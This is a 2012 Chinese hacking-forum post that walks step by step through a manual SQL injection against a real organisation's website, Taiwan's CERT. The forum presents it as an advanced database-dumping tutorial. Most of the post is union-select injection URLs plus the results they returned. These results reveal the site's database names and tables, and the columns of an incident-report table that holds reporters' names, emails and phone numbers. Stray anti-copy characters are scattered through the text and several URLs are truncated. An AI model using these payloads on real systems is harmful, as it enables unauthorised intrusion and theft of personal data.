找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 .高级暴库方法讲解
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2219|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
& H1 K4 X# I5 v( @& J2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
7 E$ |8 q0 l4 |5 z( r! @http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--. J& X9 Y& Q& `( b. A7 ?
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
$ H2 C& Q4 N* H# n) ]9 F/ G数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
$ |/ W; G0 a' m5 r* l% p4.判断有没有写权限
/ J2 s. o% i! ahttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限: e4 u. G1 r3 R9 W& E2 T* q+ S
没办法,手动猜表啦# O) V, A* j7 @$ w. t4 W; {) `
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1. h+ B' i. J9 M% V% w
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下6 D: v# A, Q: d- c( I! E% m* h
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--9 P! _  Q$ p" V$ q8 Y" a  @
成功查出所有数据库,国外的黑客就是不一般。数据库如下:  L9 e1 {6 X& w  F6 |) n+ K
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
0 C9 N; P0 h6 C$ _6.爆表,爆的是twcert库4 l+ d8 c4 N3 ^' u& H
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--" g- g! V0 \8 j% g3 H( y
爆出如下表) V3 i$ l+ Z' @7 o" w5 l, b7 C: K
downloadfile,irsys,newsdata,secrpt,secrpt_big5. w0 N' U  A' p- H! S' n9 [' R
7.爆列名,这次爆的是irsys表
( a3 L9 a$ U0 V. Ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--! _3 \: R+ B% D$ `; G# W7 w
爆出如下列3 }* z1 A2 I& V) t/ M0 H  C
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status% _2 N$ W: ]7 I8 R. m' c
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。0 Y- g$ a: q3 W" z1 K/ m
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
, b2 d- k& E$ H# ?: T  J" A返回是3,说明每个列里有3个地段, }7 B9 q6 E, R8 L7 e. |
9.爆字段内容# g4 r" v9 J) w
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
/ R  ?; d. D0 K  ?  [0 t/ K爆出name列的第一个字段的内容3 l5 B1 Q+ m% j5 G- e6 D
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
- _3 _  |1 b, t" i爆出name列的第二个字段的内容
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表